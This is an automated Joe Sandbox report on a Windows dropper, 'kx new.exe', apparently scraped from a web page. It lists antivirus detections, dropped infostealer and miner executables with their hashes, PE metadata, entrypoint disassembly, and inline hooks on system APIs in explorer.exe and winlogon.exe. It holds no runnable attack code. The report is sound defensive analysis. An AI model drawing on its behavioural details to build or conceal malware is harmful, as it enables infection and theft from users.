ROOT certificates 41->88 90 Writes to foreign memory regions 41->90

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
kx new.exe71%ReversingLabsWin32.Dropper.Dapato
kx new.exe100%AviraTR/Dropper.Gen
kx new.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Kawpow new.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\xmr new.exe74%ReversingLabsWin64.Infostealer.Tinba

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.microsoftT0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://crl.microsoftTpowershell.exe, 00000002.00000002.1493135333.000000000870A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1585415
                Start date and time:2025-01-07 16:08:11 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 11s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:72
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:4
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:kx new.exe
                Detection:MAL
                Classification:mal100.spyw.evad.winEXE@108/17@0/0
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 123
                • Number of non-executed functions: 263
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded IPs from analysis (whitelisted): 20.190.159.2, 20.190.159.73, 20.190.159.64, 20.190.159.0, 20.190.159.4, 20.190.159.68, 40.126.31.71, 20.190.159.71, 172.202.163.200
                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                • Execution Graph export aborted for target Kawpow new.exe, PID 7556 because it is empty
                • Execution Graph export aborted for target eejhedztifcv.exe, PID 7604 because it is empty
                • Execution Graph export aborted for target xmr new.exe, PID 7672 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • VT rate limit hit for: kx new.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:09:11API Interceptor1x Sleep call for process: Kawpow new.exe modified
                10:09:11API Interceptor60x Sleep call for process: powershell.exe modified
                10:09:12API Interceptor1x Sleep call for process: xmr new.exe modified
                10:09:53API Interceptor282394x Sleep call for process: lsass.exe modified
                10:09:53API Interceptor351001x Sleep call for process: winlogon.exe modified
                10:09:53API Interceptor1945x Sleep call for process: dialer.exe modified
                10:09:54API Interceptor3251x Sleep call for process: svchost.exe modified
                10:09:56API Interceptor334719x Sleep call for process: dwm.exe modified
                10:09:56API Interceptor228x Sleep call for process: WmiPrvSE.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeSolara.exeGet hashmaliciousUnknownBrowse
                  C:\Users\user\AppData\Local\Temp\Kawpow new.exeSolara.exeGet hashmaliciousUnknownBrowse
                    C:\Users\user\AppData\Local\Temp\xmr new.exeSolara.exeGet hashmaliciousUnknownBrowse

                      Created / dropped Files

                      C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

                      Download File
                      Process:C:\Users\user\AppData\Local\Temp\xmr new.exe
                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5471744
                      Entropy (8bit):6.508687886623363
                      Encrypted:false
                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                      MD5:7D6398EBFB82A24748617189BF4AD691
                      SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                      SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                      SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 74%
                      Joe Sandbox View:
                      • Filename: Solara.exe, Detection: malicious, Browse
                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                      Download File
                      Process:C:\Windows\System32\lsass.exe
                      File Type:very short file (no magic)
                      Category:modified
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:93B885ADFE0DA089CDF634904FD59F71
                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                      Malicious:false
                      Preview:.

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:NlllulFlz:NllUf
                      MD5:16D8A7BE440D46BEDCC37C8F9D4E4593
                      SHA1:B8DA9BE23D28A0B37302011579353193FD3BA566
                      SHA-256:761C903C5866AB1A9D3B2FDB6A42BD52B825277CB44E6703C634449AFFDF6460
                      SHA-512:02F634ECD03EDA05E73C5B412F7FB9F919F9C6343141E56DE38628FAF1475FE3048D21D7764C012A9A1BACFDA69C533DC7FB86ECCF63588239C90607546FFFE3
                      Malicious:false
                      Preview:@...e................................................@..........

                      C:\Users\user\AppData\Local\Temp\Kawpow new.exe

                      Download File
                      Process:C:\Users\user\Desktop\kx new.exe
                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5471744
                      Entropy (8bit):6.525931537093555
                      Encrypted:false
                      SSDEEP:98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
                      MD5:FB6A3B436E9F9402937D95F755B62F91
                      SHA1:AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
                      SHA-256:4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
                      SHA-512:7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 74%
                      Joe Sandbox View:
                      • Filename: Solara.exe, Detection: malicious, Browse
                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20a31sx4.2c1.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pjoqusk.vhu.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxz5xuz2.dqg.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvrzj2xg.dwt.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhux045r.4d3.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_la0bp50b.5t3.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mab5qpss.3wu.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odt1h45j.rgb.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qljwvqcz.kkh.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0qvrnff.fpn.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sh4m01gn.nw0.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vemm2fcj.i4i.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\xmr new.exe

                      Download File
                      Process:C:\Users\user\Desktop\kx new.exe
                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):5471744
                      Entropy (8bit):6.508687886623363
                      Encrypted:false
                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                      MD5:7D6398EBFB82A24748617189BF4AD691
                      SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                      SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                      SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 74%
                      Joe Sandbox View:
                      • Filename: Solara.exe, Detection: malicious, Browse
                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Entropy (8bit):6.9823288417626
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.94%
                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • VXD Driver (31/22) 0.00%
                      File name:kx new.exe
                      File size:10'948'608 bytes
                      MD5:d9d13fa25e880665fb471a4be57c494c
                      SHA1:7a4c1b09a9d37ff55872544a39a2cc5f0eec9523
                      SHA256:632e973ab369d51e21b499e440bdd9c4b2ffaac9e435485a648de8724e1b19f7
                      SHA512:cf20f3c108865614a27d498ee74198ee151027423b518024155b1dff553b33877aed81e7d5394094625d1ee7da5de82fa4ed119420009a3f3fc51019add3522e
                      SSDEEP:196608:p+lBkH0sN5KVaq4Jsbwd+mftM8y+uevftTJp3q73uGiCHz/u/dLTu:l0saVF4Js8d+F+53Ra3Tj41u
                      TLSH:B1B6239C9526FF238E8E5DEDB1C92F5A7A04035B56C23329A224773A50B2356FF34E50
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................@.......o.....................................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x4014d1
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:a9c887a4f18a3fede2cc29ceea138ed3

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 00000008h
                      nop
                      mov eax, 00000004h
                      push eax
                      mov eax, 00000000h
                      push eax
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      call 00007F9C20E3745Dh
                      add esp, 0Ch
                      mov eax, 004014AFh
                      push eax
                      call 00007F9C20E37497h
                      mov eax, 00000001h
                      push eax
                      call 00007F9C20E37494h
                      add esp, 04h
                      mov eax, 00030000h
                      push eax
                      mov eax, 00010000h
                      push eax
                      call 00007F9C20E37488h
                      add esp, 08h
                      mov eax, dword ptr [00E71E24h]
                      mov ecx, dword ptr [00E71E28h]
                      mov edx, dword ptr [00E71E2Ch]
                      mov dword ptr [ebp-08h], eax
                      lea eax, dword ptr [ebp-04h]
                      push eax
                      mov eax, dword ptr [00E72000h]
                      push eax
                      push edx
                      push ecx
                      mov eax, dword ptr [ebp-08h]
                      push eax
                      call 00007F9C20E37462h
                      add esp, 14h
                      mov eax, dword ptr [00E71E24h]
                      mov ecx, dword ptr [00E71E28h]
                      mov edx, dword ptr [00E71E2Ch]
                      mov dword ptr [ebp-08h], eax
                      mov eax, dword ptr [edx]
                      push eax
                      mov eax, dword ptr [ecx]
                      push eax
                      mov eax, dword ptr [ebp-08h]
                      mov eax, dword ptr [eax]
                      push eax
                      call 00007F9C20E3723Ch
                      add esp, 0Ch
                      push eax
                      call 00007F9C20E37438h
                      add esp, 04h
                      leave
                      ret
                      push ebp
                      mov ebp, esp
                      sub esp, 00000004h
                      nop
                      mov eax, dword ptr [00E71E24h]
                      mov ecx, dword ptr [ebp+08h]
                      mov dword ptr [eax], ecx
                      mov eax, dword ptr [00000000h]

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa71db00x50.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa730000x300.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xa71e000x58.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x6680x800fe360b88a7d70310ec7735c08c77eb2fFalse0.4072265625data4.606556744591122IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x20000xa6ffb30xa7000090615ee92adc6f3e61c0447244393bb3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .bss0xa720000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xa730000x3000x4000d1dee6fc25344777b8613290c733e97False0.357421875data4.312685380006898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0xa730580x2a5XML 1.0 document, ASCII textEnglishUnited States0.4756277695716396

                      Imports

                      DLLImport
                      msvcrt.dllmalloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                      shell32.dllShellExecuteA
                      kernel32.dllSetUnhandledExceptionFilter

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      No network behavior found

                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function NameHook TypeActive in Processes
                      ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                      NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                      ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                      NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                      ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                      NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                      NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                      ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                      ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                      NtResumeThreadINLINEexplorer.exe, winlogon.exe
                      RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                      NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                      NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
